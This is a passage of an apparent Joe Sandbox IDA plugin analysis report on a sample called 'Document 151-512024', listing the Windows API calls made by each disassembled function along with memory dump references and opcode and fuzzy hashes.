                                                                                                    • API ID: HandleLoadModuleString$Message
                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                    • API String ID: 4072794657-3128320259
                                                                                                    • Opcode ID: e65282bc830ab71be07fca66e40832e3572687190613dd630b3461aa38166d20
                                                                                                    • Instruction ID: 1acd326b74e93b421afde42024d205f17f870ca982fe59016b31f150975536fb
                                                                                                    • Opcode Fuzzy Hash: e65282bc830ab71be07fca66e40832e3572687190613dd630b3461aa38166d20
                                                                                                    • Instruction Fuzzy Hash: 9B0181F29542197FEB10ABE0DD89EEB336CEB09305F404992B746E2041EA749EC49F74
                                                                                                    APIs
                                                                                                    • InterlockedExchange.KERNEL32(00ECF9E0,00ECF9E0), ref: 009B097B
                                                                                                    • EnterCriticalSection.KERNEL32(00ECF9C0,00000000), ref: 009B098D
                                                                                                    • TerminateThread.KERNEL32(00000000,000001F6), ref: 009B099B
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009B09A9
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 009B09B8
                                                                                                    • InterlockedExchange.KERNEL32(00ECF9E0,000001F6), ref: 009B09C8
                                                                                                    • LeaveCriticalSection.KERNEL32(00ECF9C0), ref: 009B09CF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 3495660284-0
                                                                                                    • Opcode ID: 102b60faa15029209367799d8580243ca07df7854a220c038fc4256541936ceb
                                                                                                    • Instruction ID: 6f1ce50878bf92d4829f795c7d61263d2be34519e006cc036c0ab72e24a5788e
                                                                                                    • Opcode Fuzzy Hash: 102b60faa15029209367799d8580243ca07df7854a220c038fc4256541936ceb
                                                                                                    • Instruction Fuzzy Hash: 63F0197249BA13ABD7515BA4EE88BD6BB29BF41752F402126F202908A0C77494A5DF90
                                                                                                    APIs
                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 009C1DC0
                                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 009C1DE1
                                                                                                    • WSAGetLastError.WSOCK32 ref: 009C1DF2
                                                                                                    • htons.WSOCK32(?,?,?,?,?), ref: 009C1EDB
                                                                                                    • inet_ntoa.WSOCK32(?), ref: 009C1E8C
                                                                                                      • Part of subcall function 009A39E8: _strlen.LIBCMT ref: 009A39F2
                                                                                                      • Part of subcall function 009C3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,009BEC0C), ref: 009C3240
                                                                                                    • _strlen.LIBCMT ref: 009C1F35
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                    • String ID:
                                                                                                    • API String ID: 3203458085-0
                                                                                                    • Opcode ID: 2eea18f842e647288ff8344e8f41eb150ecf4d8a59c9d0f9bf1832eb0547bc4d
                                                                                                    • Instruction ID: fe990440146dc390908baaa0d8d397e2ab5400e27fecff3d01212323fcf7eb9a
                                                                                                    • Opcode Fuzzy Hash: 2eea18f842e647288ff8344e8f41eb150ecf4d8a59c9d0f9bf1832eb0547bc4d
                                                                                                    • Instruction Fuzzy Hash: 1DB1AD71604300AFD324DF24C895F2A77A9AFC6318F54894CF45A5B2A3DB31ED46CB92
                                                                                                    APIs
                                                                                                    • __allrem.LIBCMT ref: 009700BA
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009700D6
                                                                                                    • __allrem.LIBCMT ref: 009700ED
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0097010B
                                                                                                    • __allrem.LIBCMT ref: 00970122
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00970140
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                    • String ID:
                                                                                                    • API String ID: 1992179935-0
                                                                                                    • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                                    • Instruction ID: ccea05f44b400d8e2ef21c290fbfdd4dae4126d6c5e889cef3aa3470059d7890
                                                                                                    • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                                    • Instruction Fuzzy Hash: FA81E473A00706DBE724AF68DC52B6B73ADEFC1724F24853AF559D6681EB70D9008B50
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,009682D9,009682D9,?,?,?,0097644F,00000001,00000001,8BE85006), ref: 00976258
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0097644F,00000001,00000001,8BE85006,?,?,?), ref: 009762DE
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009763D8
                                                                                                    • __freea.LIBCMT ref: 009763E5
                                                                                                      • Part of subcall function 00973820: RtlAllocateHeap.NTDLL(00000000,?,00A11444,?,0095FDF5,?,?,0094A976,00000010,00A11440,009413FC,?,009413C6,?,00941129), ref: 00973852
                                                                                                    • __freea.LIBCMT ref: 009763EE
                                                                                                    • __freea.LIBCMT ref: 00976413
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1414292761-0
                                                                                                    • Opcode ID: cfbc14b76dcdf120b1e1f303c668a1465d187233523f68030f094591e233ffb4
                                                                                                    • Instruction ID: ff0451a093e0caa30bafaf9495db4d4cdce6e0c80523d284e270f4373a0499c2
                                                                                                    • Opcode Fuzzy Hash: cfbc14b76dcdf120b1e1f303c668a1465d187233523f68030f094591e233ffb4
                                                                                                    • Instruction Fuzzy Hash: 2451CF73600A16ABEB258F64CC81FAF77A9EB84B50F158629FC09D6151EB34DC44D660
                                                                                                    APIs
                                                                                                      • Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD
                                                                                                      • Part of subcall function 009CC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009CB6AE,?,?), ref: 009CC9B5
                                                                                                      • Part of subcall function 009CC998: _wcslen.LIBCMT ref: 009CC9F1
                                                                                                      • Part of subcall function 009CC998: _wcslen.LIBCMT ref: 009CCA68
                                                                                                      • Part of subcall function 009CC998: _wcslen.LIBCMT ref: 009CCA9E
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009CBCCA
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009CBD25
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 009CBD6A
                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 009CBD99
                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 009CBDF3
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 009CBDFF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 1120388591-0
                                                                                                    • Opcode ID: 8d6601302e71ec0c1c2bd68050b37a48431ca9c7fa89c023fae51df68fa21873
                                                                                                    • Instruction ID: cc3e22a30e3bf2df2002e155c69947217bcd104a45bb7ff262d1e1ba4e4f0cce
                                                                                                    • Opcode Fuzzy Hash: 8d6601302e71ec0c1c2bd68050b37a48431ca9c7fa89c023fae51df68fa21873
                                                                                                    • Instruction Fuzzy Hash: 5C819070518241AFC714DF24C896F2ABBE9FF84308F14895DF49A4B2A2DB31ED45CB92
                                                                                                    APIs
                                                                                                    • VariantInit.OLEAUT32(00000035), ref: 0099F7B9
                                                                                                    • SysAllocString.OLEAUT32(00000001), ref: 0099F860
                                                                                                    • VariantCopy.OLEAUT32(0099FA64,00000000), ref: 0099F889
                                                                                                    • VariantClear.OLEAUT32(0099FA64), ref: 0099F8AD
                                                                                                    • VariantCopy.OLEAUT32(0099FA64,00000000), ref: 0099F8B1
                                                                                                    • VariantClear.OLEAUT32(?), ref: 0099F8BB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                                                                    • String ID:
                                                                                                    • API String ID: 3859894641-0
                                                                                                    • Opcode ID: 288662f16ad749f31259b641a9f877a6b03cd158adf5579c7d81eedf9e4b2b0e
                                                                                                    • Instruction ID: 0a6659997a4faa235156532ece7778eb12eb78eb4e3d35a728b294535efadc0f
                                                                                                    • Opcode Fuzzy Hash: 288662f16ad749f31259b641a9f877a6b03cd158adf5579c7d81eedf9e4b2b0e
                                                                                                    • Instruction Fuzzy Hash: D651D635610310BACF24AF69D8A5B69F3A8EF85320F248867F906DF291DB74CC40C796
                                                                                                    APIs
                                                                                                      • Part of subcall function 00947620: _wcslen.LIBCMT ref: 00947625
                                                                                                      • Part of subcall function 00946B57: _wcslen.LIBCMT ref: 00946B6A
                                                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 009B94E5
                                                                                                    • _wcslen.LIBCMT ref: 009B9506
                                                                                                    • _wcslen.LIBCMT ref: 009B952D
                                                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 009B9585
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$FileName$OpenSave
                                                                                                    • String ID: X
                                                                                                    • API String ID: 83654149-3081909835
                                                                                                    • Opcode ID: 819b3c7ec0f4556a7eaf5f51a26576353e351d0d3d1d43963573f697e0c87554
                                                                                                    • Instruction ID: d73d253bb5cc3d05c65fb8590bf7129c983d98ad23ad87e75f47328752afbb2a
                                                                                                    • Opcode Fuzzy Hash: 819b3c7ec0f4556a7eaf5f51a26576353e351d0d3d1d43963573f697e0c87554
                                                                                                    • Instruction Fuzzy Hash: A6E18B319183018FD724DF24C981FAAB7E4BF85324F04896DF9999B2A2DB31DD05CB92
                                                                                                    APIs
                                                                                                      • Part of subcall function 00959BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00959BB2
                                                                                                    • BeginPaint.USER32(?,?,?), ref: 00959241
                                                                                                    • GetWindowRect.USER32(?,?), ref: 009592A5
                                                                                                    • ScreenToClient.USER32(?,?), ref: 009592C2
                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 009592D3
                                                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 00959321
                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 009971EA
                                                                                                      • Part of subcall function 00959339: BeginPath.GDI32(00000000), ref: 00959357
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                    • String ID:
                                                                                                    • API String ID: 3050599898-0
                                                                                                    • Opcode ID: b6fb3be686db9560cebaaf0647cb8181bec4bcbc60710dc94c5b894004de9886
                                                                                                    • Instruction ID: ea71935315e06a2e11f7875215411447b8410f90a4626438244079a5d9a3f5df
                                                                                                    • Opcode Fuzzy Hash: b6fb3be686db9560cebaaf0647cb8181bec4bcbc60710dc94c5b894004de9886
                                                                                                    • Instruction Fuzzy Hash: E641A370109301EFE721DF65CC84FBA7BB8EF55321F144669FAA4871A1C7319849DB61
                                                                                                    APIs
                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 009B080C
                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 009B0847
                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 009B0863
                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 009B08DC
                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 009B08F3
                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 009B0921
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                    • String ID:
                                                                                                    • API String ID: 3368777196-0
                                                                                                    • Opcode ID: 1d02e4462e13e909ce8067a4312ad2a171c2cc83fede35fbc3110be00c63e508
                                                                                                    • Instruction ID: 155b37d36c597813e1d7a10250bfade4958fee3e72ca2888a9d12eb42f0b0163
                                                                                                    • Opcode Fuzzy Hash: 1d02e4462e13e909ce8067a4312ad2a171c2cc83fede35fbc3110be00c63e508
                                                                                                    • Instruction Fuzzy Hash: 21416971900205EFDF14EF54DC85AAA77B8FF84320F1440A5ED04AA297DB31DE65DBA0
                                                                                                    APIs
                                                                                                    • IsWindowVisible.USER32(?), ref: 009A4C95
                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 009A4CB2
                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 009A4CEA
                                                                                                    • _wcslen.LIBCMT ref: 009A4D08
                                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 009A4D10
                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 009A4D1A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                    • String ID:
                                                                                                    • API String ID: 72514467-0
                                                                                                    • Opcode ID: 7065de480caf05523edc185d0820a82bbd4098bd0e3f870fe4f134aa3ffd6d76
                                                                                                    • Instruction ID: 3936ec47491f13846a7640208bd02adca08f799177720b0f079f1d678ec104af
                                                                                                    • Opcode Fuzzy Hash: 7065de480caf05523edc185d0820a82bbd4098bd0e3f870fe4f134aa3ffd6d76
                                                                                                    • Instruction Fuzzy Hash: 7621F9726052017BEB159B399C4AE7B7BACDFC6760F10403AF809CA191DEA5DC40D7E0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00943AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00943A97,?,?,00942E7F,?,?,?,00000000), ref: 00943AC2
                                                                                                    • _wcslen.LIBCMT ref: 009B587B
                                                                                                    • CoInitialize.OLE32(00000000), ref: 009B5995
                                                                                                    • CoCreateInstance.OLE32(009DFCF8,00000000,00000001,009DFB68,?), ref: 009B59AE
                                                                                                    • CoUninitialize.OLE32 ref: 009B59CC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                    • String ID: .lnk
                                                                                                    • API String ID: 3172280962-24824748
                                                                                                    • Opcode ID: 93d7dab42d3944c01f5be1522ce329656eb1341f22e55d95733055bde4258fe6
                                                                                                    • Instruction ID: 44632d50214d689f0dfdc3c4bb17e7e8eed9fe2176582f12d7684dfb76edb760
                                                                                                    • Opcode Fuzzy Hash: 93d7dab42d3944c01f5be1522ce329656eb1341f22e55d95733055bde4258fe6
                                                                                                    • Instruction Fuzzy Hash: C1D18271A087119FC704DF24C580A6ABBE5FF89724F11885DF88A9B361DB32EC45CB92
                                                                                                    APIs
                                                                                                      • Part of subcall function 009A0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009A0FCA
                                                                                                      • Part of subcall function 009A0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009A0FD6
                                                                                                      • Part of subcall function 009A0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009A0FE5
                                                                                                      • Part of subcall function 009A0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009A0FEC
                                                                                                      • Part of subcall function 009A0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009A1002
                                                                                                    • GetLengthSid.ADVAPI32(?,00000000,009A1335), ref: 009A17AE
                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 009A17BA
                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 009A17C1
                                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 009A17DA
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,009A1335), ref: 009A17EE
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 009A17F5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                    • String ID:
                                                                                                    • API String ID: 3008561057-0
                                                                                                    • Opcode ID: 570c0ed33d1b113a80465dfb36af273f7ce1c421451a17b450b45c49f392920f
                                                                                                    • Instruction ID: de102773c85c18339bd6b40b2ecfc135628f8f30abb306fff7be7f4a53cc36f8
                                                                                                    • Opcode Fuzzy Hash: 570c0ed33d1b113a80465dfb36af273f7ce1c421451a17b450b45c49f392920f
                                                                                                    • Instruction Fuzzy Hash: 8111BE75559216FFDB109FA4CC49FAE7BADEB42359F104019F481A7290C735A980DBA0
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009A14FF
                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 009A1506
                                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 009A1515
                                                                                                    • CloseHandle.KERNEL32(00000004), ref: 009A1520
                                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009A154F
                                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 009A1563
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                    • String ID:
                                                                                                    • API String ID: 1413079979-0
                                                                                                    • Opcode ID: 943a04af3fd855222f0fb9ecb242f1bb794b8e2b75c37b308babbbcbc4183590
                                                                                                    • Instruction ID: bdd2dd2ecb8674c1c64e6a9b14032a728a40919aeef2667802fc0ec3c02d9dc8
                                                                                                    • Opcode Fuzzy Hash: 943a04af3fd855222f0fb9ecb242f1bb794b8e2b75c37b308babbbcbc4183590
                                                                                                    • Instruction Fuzzy Hash: 19113DB264520EABDF118F98DD49FDE7BADEF49748F044115FA05A2060C375CE60EB60
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,00963379,00962FE5), ref: 00963390
